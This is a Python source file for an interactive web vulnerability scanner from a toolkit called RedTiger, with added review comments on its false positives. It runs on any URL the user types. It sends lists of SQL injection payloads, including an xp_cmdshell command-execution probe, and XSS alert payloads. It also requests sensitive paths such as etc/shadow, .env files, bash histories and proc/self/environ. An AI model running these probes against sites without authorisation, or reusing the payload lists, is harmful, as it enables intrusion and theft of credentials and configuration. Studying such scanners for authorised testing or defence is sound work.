# Copyright (c) RedTiger
# See the file 'LICENSE' for copying permission
# ----------------------------------------------------------------------------------------------------------------------------------------------------------|
# EN: 
#     - Do not touch or modify the code below. If there is an error, please contact the owner, but under no circumstances should you touch the code.
#     - Do not resell this tool, do not credit it to yours.
# FR: 
#     - Ne pas toucher ni modifier le code ci-dessous. En cas d'erreur, veuillez contacter le propriétaire, mais en aucun cas vous ne devez toucher au code.
#     - Ne revendez pas ce tool, ne le créditez pas au vôtre.

from Config.Util import *
from Config.Config import *

# `requests` is a third-party dependency; any exception raised while importing
# it is handed to ErrorModule.
try:
    import requests
except Exception as e:
    ErrorModule(e)

# NOTE(review): the title names only SQL, but the script below also runs the
# Xss, InterestingPath and SensitiveFile checks.
Title("Sql Vulnerability Scanner")

try:
    # The User-Agent is chosen once; this header dict is the module-level
    # `headers` that CheckPaths and TestPayloads pass to every requests.get call.
    user_agent = ChoiceUserAgent()
    headers = {"User-Agent": user_agent}

    def InterestingPath(url):
        """Probe `url` for a fixed wordlist of commonly exposed locations.

        The wordlist is assembled from per-area groups (order preserved) and
        handed to CheckPaths, which reports every entry answering HTTP 200
        under the label "Interesting Path".
        """
        admin_entries = ["admin", "admin/", "admin/index.php", "admin/login.php", "admin/config.php"]
        backup_entries = ["backup", "backup/", "backup/db.sql", "backup/config.tar.gz", "backup/backup.sql"]
        private_entries = ["private", "private/", "private/.env", "private/config.php", "private/secret.txt"]
        upload_entries = ["uploads", "uploads/", "uploads/file.txt", "uploads/image.jpg", "uploads/backup.zip"]
        api_entries = ["api", "api/", "api/v1/", "api/v1/users", "api/v1/status"]
        log_entries = ["logs", "logs/", "logs/error.log", "logs/access.log", "logs/debug.log"]
        cache_entries = ["cache", "cache/", "cache/temp/", "cache/session/", "cache/data/"]
        status_entries = ["server-status", "server-status/", "server-status/index.html"]
        dashboard_entries = ["dashboard", "dashboard/", "dashboard/index.html", "dashboard/admin.php", "dashboard/settings.php"]

        candidates = (
            admin_entries
            + backup_entries
            + private_entries
            + upload_entries
            + api_entries
            + log_entries
            + cache_entries
            + status_entries
            + dashboard_entries
        )
        CheckPaths(url, candidates, "Interesting Path")

    def SensitiveFile(url):
        """Check whether `url` serves files at system-style relative paths.

        Each entry is requested as `url + "/" + entry` by CheckPaths, so a hit
        means the web server answered HTTP 200 for that relative URL; nothing
        here reads the host's filesystem directly.
        """
        system_entries = ["etc/passwd", "etc/password", "etc/shadow", "etc/group", "etc/hosts", "etc/hostname"]
        log_entries = ["var/log/auth.log", "var/log/syslog", "var/log/messages", "var/log/nginx/access.log"]
        user_and_app_entries = ["root/.bash_history", "home/user/.bash_history", "www/html/wp-config.php", "proc/self/environ"]
        misc_entries = ["opt/lampp/phpmyadmin/config.inc.php", "boot/grub/menu.lst", "proc/net/tcp"]

        candidates = system_entries + log_entries + user_and_app_entries + misc_entries
        CheckPaths(url, candidates, "Sensitive File")

    def Xss(url):
        """Run the reflected-markup probes against `url` via TestPayloads.

        TestPayloads appends each probe to the URL and reports "Xss" when the
        response is HTTP 200, differs from the baseline page and contains one
        of the markers below (case-insensitive substring match).
        """
        probes = [
            "<script>alert('XssFoundByRedTiger')</script>",
            "<img src=x onerror=alert('XssFoundByRedTiger')>",
            "<svg/onload=alert('XssFoundByRedTiger')>"
        ]
        # NOTE(review): markers such as "<script>" and "alert(" can occur in
        # ordinary page markup, and none of them is the unique probe string, so
        # a match does not by itself show that the probe was reflected.
        markers = ["<script>", "alert(", "onerror=", "<svg", "javascript:"]
        TestPayloads(url, probes, markers, "Xss")

    def Sql(url):
        """Run the SQL error-message probes against `url` via TestPayloads.

        TestPayloads appends each probe to the URL and reports "Sql" when the
        response is HTTP 200, differs from the baseline page and contains one
        of the error markers below (case-insensitive substring match).
        """
        # NOTE(review): several entries are repeated (for example "' OR 1=1 --"
        # and "' OR 1=1#"); every repeat is sent as its own request.
        probes = [
            "'", '"', "''", "' OR '1'='1'", "' OR '1'='1' --", "' OR '1'='1' /*", "' OR 1=1 --", "/1000",
            "' OR 1=1 /*", "' OR 'a'='a", "' OR 'a'='a' --", "' OR 'a'='a' /*", "' OR ''='", "admin'--", "admin' /*",
            "' OR 1=1#", "' OR '1'='1' (", "') OR ('1'='1", "'; EXEC xp_cmdshell('dir'); --", "' UNION SELECT NULL, NULL, NULL --",
            "' OR 1=1 --", "' OR '1'='1' --", "' OR '1'='1' #", "' OR '1'='1'/*", "' OR '1'='1'--", "' OR 1=1#", "' OR 1=1/*",
            "' OR 'a'='a'#", "' OR 'a'='a'/*", "' OR ''=''", "' OR '1'='1'--", "admin' --", "admin' #", "' OR 1=1--", "' OR 1=1/*",
            "' OR 'a'='a'--", "' OR ''=''", "' OR 'x'='x'", "' OR 'x'='x'--", "' OR 'x'='x'/*", "' OR 1=1#", "' OR 1=1--",
            "' OR 1=1/*", "' OR '1'='1'/*", "' OR '1'='1'--", "' OR '1'='1'#", "' OR '1'='1'/*"
        ]
        # NOTE(review): "sql", "Sql", "Warning", "Error" and "MySQL" are generic
        # words; because matching is a case-insensitive substring test, any
        # changed page containing them is reported, so a hit needs manual
        # confirmation before it is treated as a finding.
        error_markers = [
            "SQL syntax", "SQL error", "MySQL", "mysql", "MySQLYou",
            "Unclosed quotation mark", "SQLSTATE", "syntax error", "ORA-",
            "SQLite", "PostgreSQL", "Truncated incorrect", "Division by zero",
            "You have an error in your SQL syntax", "Incorrect syntax near",
            "SQL command not properly ended", "sql", "Sql", "Warning", "Error"
        ]
        TestPayloads(url, probes, error_markers, "Sql")

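    def CheckPaths(url, paths, vulnerability_name):
        """Request each relative path under `url` and report those answering HTTP 200.

        Args:
            url: Base URL; a trailing "/" is appended when it is missing.
            paths: Iterable of relative paths appended to the base URL.
            vulnerability_name: Label shown in the printed result lines.

        Prints one "True" line per path that returns 200, a single "False"
        line when none does, or one "Error during testing" line if a request
        raises; in that case the remaining paths are not checked.
        """
        try:
            if not str(url).endswith("/"):
                url += "/"
            found = False
            for path in paths:
                # requests.get follows redirects by default, so the status
                # compared below is that of the final response.
                response = requests.get(url + path, timeout=10, headers=headers)
                # NOTE(review): a 200 status is the only evidence used. A server
                # that answers 200 for unknown paths (custom error page,
                # catch-all route) makes every entry look "found"; results need
                # manual confirmation.
                if response.status_code == 200:
                    found = True
                    print(f"{BEFORE_GREEN + current_time_hour() + AFTER_GREEN} {GEN_VALID} Vulnerability: {white + vulnerability_name + green} Status: {white}True{green} Path Found: {white}/{path + green}")
            if not found:
                print(f"{BEFORE + current_time_hour() + AFTER} {ERROR} Vulnerability: {white + vulnerability_name + red} Status: {white}False{red}")
        except Exception:
            # Not a bare `except:`: KeyboardInterrupt and SystemExit must
            # propagate so the operator can stop a running scan instead of
            # having Ctrl-C reported as a test error and the next check started.
            print(f"{BEFORE + current_time_hour() + AFTER} {ERROR} Vulnerability: {white + vulnerability_name + red} Status: {white}Error during testing{red}")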

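    def TestPayloads(url, payloads, indicators, vulnerability_name):
        """Append each payload to `url` and look for indicator strings in the reply.

        Args:
            url: Target URL; fetched once unchanged as the baseline, then a
                trailing "/" is appended when it is missing.
            payloads: Strings appended to the URL as a trailing path component.
            indicators: Substrings searched for, case-insensitively, in the body.
            vulnerability_name: Label shown in the printed result lines.

        A payload is reported when its response is HTTP 200, its lower-cased
        body differs from the lower-cased baseline body, and at least one
        indicator occurs in it (only the first matching indicator is printed).
        Prints a single "False" line when nothing matched, or one
        "Error during testing" line if a request raises; in that case the
        remaining payloads are not sent.
        """
        try:
            response_old = requests.get(url, timeout=10, headers=headers)
            # Lower-case the baseline once instead of on every comparison.
            baseline_body = response_old.text.lower()
            if not str(url).endswith("/"):
                url += "/"
            found = False
            for payload in payloads:
                response = requests.get(url + payload, timeout=10, headers=headers)
                if response.status_code != 200:
                    continue
                body = response.text.lower()
                # NOTE(review): pages with per-request content (timestamps,
                # tokens) always differ from the baseline, so this comparison
                # filters little; together with generic indicators it makes a
                # "True" result a hint to verify, not a confirmed finding.
                if body == baseline_body:
                    continue
                for indicator in indicators:
                    if indicator.lower() in body:
                        found = True
                        print(f"{BEFORE_GREEN + current_time_hour() + AFTER_GREEN} {GEN_VALID} Vulnerability: {white + vulnerability_name + green} Status: {white}True{green} Provocation: {white + payload + green} Indicator: {white + indicator}")
                        break
            if not found:
                print(f"{BEFORE + current_time_hour() + AFTER} {ERROR} Vulnerability: {white + vulnerability_name + red} Status: {white}False{red}")
        except Exception:
            # Not a bare `except:`: KeyboardInterrupt and SystemExit must
            # propagate so the operator can stop a running scan instead of
            # having Ctrl-C reported as a test error and the next check started.
            print(f"{BEFORE + current_time_hour() + AFTER} {ERROR} Vulnerability: {white + vulnerability_name + red} Status: {white}Error during testing{red}")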

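    # Interactive entry flow: show the banner, read the target URL, normalise
    # it, then run the four checks in a fixed order.
    Slow(sql_banner)
    print(f"{BEFORE + current_time_hour() + AFTER} {INFO} Selected User-Agent: {white + user_agent}")
    # Strip surrounding whitespace so the same value is passed to Censored and
    # to the requests made by the checks.
    website_url = input(f"{BEFORE + current_time_hour() + AFTER} {INPUT} Website Url -> {reset}").strip()
    Censored(website_url)

    print(f"{BEFORE + current_time_hour() + AFTER} {WAIT} Looking for a vulnerability...")
    # Test the scheme as a prefix, not a substring: an input such as
    # "example.com/?next=http://other" has no scheme of its own and previously
    # skipped this step, after which every check failed with
    # "Error during testing".
    if not website_url.lower().startswith(("https://", "http://")):
        website_url = "https://" + website_url

    Sql(website_url)
    Xss(website_url)
    InterestingPath(website_url)
    SensitiveFile(website_url)
    Continue()
    Reset()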

except Exception as e:
    Error(e)

